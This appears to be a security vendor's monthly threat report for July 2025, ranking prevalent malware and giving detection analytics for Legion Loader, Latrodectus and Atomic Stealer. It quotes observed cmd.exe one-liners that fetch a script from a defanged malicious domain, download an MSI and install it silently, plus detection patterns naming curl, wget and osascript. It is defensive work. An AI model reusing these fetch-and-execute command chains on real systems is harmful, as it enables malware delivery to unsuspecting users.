Highlights from July
This July marks NetSupport Manager’s first time hitting number 1 on our top 10 most prevalent threat list. Its use as a payload following Scarlet Goldfinch, paste and run, and other phishing activity placed it in the top spot this month. The other threats on our top 10 list for July are no strangers to the list, including Amber Albatross, which dropped to 2nd. CleanUpLoader carried over from its debut last month and remained in 3rd, and LummaC2 returned to the top 5 for the first time since May 2025, which was before this year’s takedown.
ICYMI: Read our new research into how DripDropper Linux malware persists in the cloud.
This month, we’d like to highlight a few threats that landed just outside our top 10 rankings. One of the things our intelligence team focuses on is differentiating initial access from final payloads. Especially in today’s as-a-service economy, where initial access brokers and delivery affiliates may work with multiple adversaries to deliver a variety of payloads, we find it helps to draw lines between these stages of an attack. When we detect and stop a threat before it can deliver its payload, sometimes we have enough information to determine what the intended payload would have been with a high level of confidence. When that happens, we track it as precursor activity for the intended payload, and do not include it in the official tallies for our top 10 threats since the payload was ultimately not seen in a customer environment.
When taking this precursor activity into account, there are three additional threats that appear in the top 10 for July; if they weren’t detected and remediated early, these payloads would have been on our top 10 list this month:
- Legion Loader, a dropper that delivers a variety of different payloads. This would have been its debut on our top 10 list.
- Latrodectus, a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, most recently appeared in the top 10 in May 2025.
- Atomic Stealer, an information stealer malware family designed to target macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets. It last appeared in the top 10 in August 2024. Another member of this malware family, Poseidon Stealer, made its debut last month.
You can read more about these three threats below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for July 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⬆ 1 | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬇ 2 | Threat name: | Threat description : Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
| Month's rank: ➡ 3* | Threat name: CleanUpLoader | Threat description : A loader designed to maintain persistence and deliver additional threats |
| Month's rank: ⬆ 3* | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
| Month's rank: ⬆ 5* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Month's rank: ⬆ 5* | Threat name: | Threat description : Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| Month's rank: ⬇ 5* | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
| Month's rank: ⬇ 8* | Threat name: | Threat description : Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| Month's rank: ⬇ 8* | Threat name: | Threat description : Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Legion Loader leverages paste and run
If its precursor activity hadn’t been detected and remediated, Legion Loader would have made its debut on our list in a tie for 8th. Also known as Satacom/CurlyGate/RobotDropper, Legion Loader has been active since at least 2019, delivering a variety of different payloads. At Red Canary we’ve observed LummaC2 and StealC as Legion Loader follow-on payloads in 2025.
Much of the Legion Loader precursor activity we saw in July 2025 is similar to a campaign that has reportedly been active since at least February 2025, which leverages fake CAPTCHAs and Cloudflare Turnstile for initial execution. In June 2025, Legion Loader was spotted as one of the payloads for malicious AI-themed search-engine-optimization-poisoned websites.
Since Legion Loader has recently been deployed via paste and run/fake CAPTCHA, that gives us a detection opportunity for its precursor delivery vehicle.
Detection opportunity: Explorer spawning msiexec with a command line containing a remote address
The following pseudo-detection analytic identifies explorer spawning msiexec with a command line containing a remote address. This could be leveraged to download a legitimate MSI file, but has also been used by threats like paste and run/fake CAPTCHA to download remotely hosted malicious scripts and code.
process_parent == (explorer.exe)
&&
process ==(msiexec)
&&
command_includes ('http:', 'https:')
Latrodectus latches onto malicious ads
Latrodectus is a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, and would have landed in a tie for 8th this July if it had gone unchecked. Similar to activity observed for Legion Loader in July, Latrodectus also leveraged fake Cloudflare CAPTCHAs for distribution and execution. We’ve received reports of malicious ads leading to the fake CAPTCHA pages that went on to attempt Latodectus delivery.
In this recent campaign, if paste and run executes successfully it uses curl to write a script to dfc.log, followed by ftp.exe executing the script stored in dfc.log to download Latrodectus as an MSI file.
Here’s an example of one threat that progressed to writing the Latrodectus MSI:
- Initially, explorer.exe executed:
"C:\WINDOWS\system32\cmd.exe" /i /c cd C:\Users\username && curl.exe --proto-default httP -L -o "dcf.log" jhitu[.]com/obs.php && ftp -s:dcf.log && service : 7818 - Followed by
ftp.exeexecuting:C:\WINDOWS\system32\cmd.exe /C cmd /c cd %appdata% && curl.exe --proto-default httP -L -o open.msi jhitu[.]com/index.php && msiexec /i open.msi /qn & powershell -w h -c exit - Then
curl.exemade outbound netconns to104.21.64[.]1:80 (jhitu[.]com)and subsequently wrote the Latrodectus MSI,C:\users\username\open.msi, to disk
The cmd.exe commands above are designed to execute multiple commands at one time and reach out to a remote resource, which gives us a detection opportunity.
Detection opportunity: Command Processor (cmd.exe) executing multiple commands in one line using the && operator
The following pseudo-detection analytic identifies one-liner cmd.exe commands joined by the && operator to access remote resources. Adversaries, like those behind the recent Latrodectus distribution campaign, will write commands to concurrently download and execute a secondary payload hosted on a remote server. This activity may theoretically occur with custom admin scripting, so it should always warrant investigation of the CLI to determine its purpose.
process_parent == (explorer.exe)
&&
process ==(cmd.exe)
&&
command_includes ('&&', 'http')
Atomic Stealer flips the osascript
Atomic Stealer would have landed in a tie for 10th this month if we included precursor activity. Also known as AMOS, it’s an information stealer malware family designed to target macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets.
Last month another stealer in this malware family, Poseidon Stealer, made its debut in the top 10 in 8th place. As we mentioned then, numerous versions and frequent rebranding make differentiating between variations in the malware family challenging. Based on our ongoing research, we assess the activity we saw in July is best tracked as Atomic Stealer.
One of the silver linings in the similarities between these stealers is the overlap in useful detection analytics for them. For example, they frequently leverage osascript in a variety of suspicious ways. We recently saw osascript used by Atomic Stealer to download and execute content, which gives us a detection opportunity.
Detection opportunity: AppleScript interpreter osascript launching with the -e switch to download and and execute content
The following pseudo detection analytic identifies the AppleScript interpreter osascript launching with the -e switch to download and and execute content. This technique can be used by macOS threats like Atomic Stealer to launch various scripting utilities or shells, for persistence, or to manipulate the user via interactive messages. osascript has many legitimate uses similar to wscript/cscript, including automated admin tasks/scripts and other internally developed scripts, so additional investigation will be needed to determine if its use is malicious.
process== ('osascript')
&&
command_includes ('-e', 'do ', ' script', 'http')
&&
command_includes('wget', 'curl')
Related Articles
Patching for persistence: How DripDropper Linux malware moves through the cloud